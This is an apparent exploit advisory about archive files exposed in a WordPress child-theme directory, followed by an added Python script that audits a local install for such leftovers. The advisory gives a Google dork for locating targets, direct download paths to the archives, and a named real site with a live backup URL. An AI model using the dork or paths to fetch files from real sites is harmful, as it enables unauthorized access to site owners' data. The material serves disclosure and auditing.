WordPress Total-Child-Theme-Master theme version 1.0 suffers from an arbitrary file disclosure vulnerability.
#################################################################################################
# Exploit Title : WordPress Total-Child-Theme-Master Themes 1.0 Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org ~ wpexplorer-themes.com/total/docs/child-theme/
# Software Download Link : wpexplorer.s3.amazonaws.com/freebies/total-child-theme.zip + github.com/wpexplorer/total-child-theme
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/total-child-theme-master/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/themes/total-child-theme-master/.....
/wp-content/themes/total-child-theme-master/Final%20LP%20TEMP.zip
/wp-content/themes/total-child-theme-master/Human-services-templates.zip
/wp-content/themes/total-child-theme-master/aa-archive-final.zip
/wp-content/themes/total-child-theme-master/aa-backup-single.zip
/wp-content/themes/total-child-theme-master/aa-backup-taxonomy.zip
/wp-content/themes/total-child-theme-master/aaaaaaaaaaaaaaaaaa-blog.php.zip
/wp-content/themes/total-child-theme-master/aaaaaaalatestsb-lp.zip
/wp-content/themes/total-child-theme-master/aa%20final%20sidebar%20fix.zip
/wp-content/themes/total-child-theme-master/author-template.zip
#################################################################################################
# Example Vulnerable Site =>
[+] mediware.com/wp-content/themes/total-child-theme-master/aa-backup-single.zip
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
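The paths listed above are archives left inside the theme directory, which the web server hands out as static files. A site owner can audit an install for the same condition with the script below. It is an added example, not part of the original advisory; the extension list and the names find_exposed_archives and build_sample_tree are assumptions of the example.

```python
import os
import sys
import tempfile
from urllib.parse import quote

# Suffixes a web server normally hands out as static downloads.
# The list is an assumption for this example; extend it for your site.
ARCHIVE_EXTS = (".zip", ".tar", ".tar.gz", ".tgz", ".gz", ".rar", ".7z", ".bak", ".sql")


def find_exposed_archives(wp_root):
    """Return sorted, URL-encoded request paths of archives under wp-content/themes."""
    themes_dir = os.path.join(wp_root, "wp-content", "themes")
    hits = []
    for dirpath, _dirs, files in os.walk(themes_dir):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXTS):
                rel = os.path.relpath(os.path.join(dirpath, name), wp_root)
                # Encode the way the file would be requested (spaces become %20).
                hits.append("/" + quote(rel.replace(os.sep, "/")))
    return sorted(hits)


def build_sample_tree(root):
    """Constructed sample install: two theme files plus two leftover archives."""
    theme = os.path.join(root, "wp-content", "themes", "total-child-theme-master")
    os.makedirs(theme)
    for name in ("style.css", "functions.php", "aa-backup-single.zip", "Final LP TEMP.zip"):
        with open(os.path.join(theme, name), "w") as fh:
            fh.write("placeholder")
    return root


if __name__ == "__main__":
    if len(sys.argv) > 1:
        root = sys.argv[1]  # path to a real WordPress document root
    else:
        root = build_sample_tree(tempfile.mkdtemp())  # constructed demo data
    for path in find_exposed_archives(root):
        print("archive stored under the web root:", path)
```

Any path it reports should be moved out of the document root or deleted, since theme directories are served without authentication.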